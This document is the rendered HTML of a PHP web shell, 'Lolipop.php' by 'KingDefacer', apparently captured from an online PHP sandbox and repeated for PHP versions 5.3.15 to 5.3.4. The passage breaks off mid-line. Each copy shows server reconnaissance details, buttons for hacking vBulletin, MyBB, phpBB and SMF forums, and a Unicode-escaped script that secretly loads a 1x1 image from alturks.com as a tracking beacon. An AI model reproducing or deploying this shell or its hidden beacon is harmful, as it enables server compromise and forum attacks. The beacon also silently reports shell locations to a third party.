SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.3.15
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.3.15</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.3.14
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.3.14</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.3.13
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.3.13</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.3.12
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.3.12</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.3.11
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.3.11</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.3.10
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.3.10</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.3.9
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.3.9</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.3.8
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.3.8</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.3.7
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.3.7</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.3.6
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.3.6</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.3.5
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.3.5</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.3.4
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.3.4</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: 